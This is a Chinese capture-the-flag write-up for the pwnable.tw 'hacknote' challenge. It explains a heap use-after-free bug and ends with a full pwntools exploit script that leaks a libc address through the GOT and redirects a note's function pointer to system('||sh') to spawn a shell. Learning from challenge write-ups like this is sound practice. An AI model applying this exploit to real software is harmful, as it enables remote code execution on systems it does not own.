Pwnable.tw hacknote

一道适合入门的堆利用题目

需要事先了解 malloc 相关的堆分配机制(fastbin,normal bin等)

先用ida 分析以下,有add,delete,print 3个主要功能,一个note 会分配8个字节,前四字节指向print功能所要调用的函数,后四节指向note中的具体内容。

漏洞比较明显,在delete的时候,没有将指针置为Null,可创造一个迷途指针,从而进行UAF。


基本的思路是先add 两次,但是内容的大小不能是8字节,不然会分配 4个 16字节的fast bin;然后再delete两次,此时 fast bin链表如图:


此时add 第三个note,并输入内容大小为8,由于fast bin 采用LIFO原则,会取出note1的16字节 存放新note的结构体,取出note0 的16字节 存放新的内容,此时得到了修改note0结构体的机会,可把note0的前4字节改为我们想执行的函数地址;完成之后,我们执行print(0),函数就会执行。

由于题目提供了libc,我们可以先触发一次漏洞来泄露地址,然后再触发一次漏洞来执行system。

这里有个问题就是system函数的参数,传入该函数的参数是note0结构体自身,无法直接穿如字符串“\bin\sh”,这里的知识点是system参数可用“||”截断,比如 system("hsasoijiojo||/bin/sh")

最终的payload

from pwn import *

    con=remote("chall.pwnable.tw", 10102)

    e=ELF("hacknote")

    elib=ELF("libc_32.so.6")

    puts_got=0x804a024#e.got["puts"]

    printn=0x804862b

def addNote(size,content):

    con.recvuntil("choice :")

    con.sendline("1")

    con.recvuntil("size :")

    con.sendline(str(size))

    con.recvuntil("Content :")

    con.sendline(content)

def deleteNote(index):

    con.recvuntil("choice :")

    con.sendline("2")

    con.recvuntil("Index :")

    con.sendline(str(index))

def printNote(index):

    con.recvuntil("choice :")

    con.sendline("3")

    con.recvuntil("Index :")

    con.sendline(str(index))


addNote(24,24*"a")

addNote(24,24*"a")

deleteNote(0)

deleteNote(1)

addNote(8,p32(printn)+p32(puts_got))

printNote(0)

p=con.recv()

puts_addr=u32(p[:4])

d_value=elib.symbols["puts"]-elib.symbols["system"]

sys_addr=puts_addr-d_value

deleteNote(2)

addNote(8,flat([sys_addr,"||sh"]))

printNote(0)

con.interactive()

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 0x00漏洞简介 uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的...
    BJChangAn阅读 1,203评论 0 0
  • 这是正是进入工作的第三个月 不知道是幸运还是不幸运,人生中的第一份正式工作真的很轻松,每天7个半小时的工作日,偶尔...
    双鱼座政委ss阅读 416评论 9 3
  • ping网卡即ping自己的回送地址 127.0.0.1 出现上图即ping通,说明网卡没问题(TTL=多少没关系...
    lianzhanshu阅读 1,312评论 0 50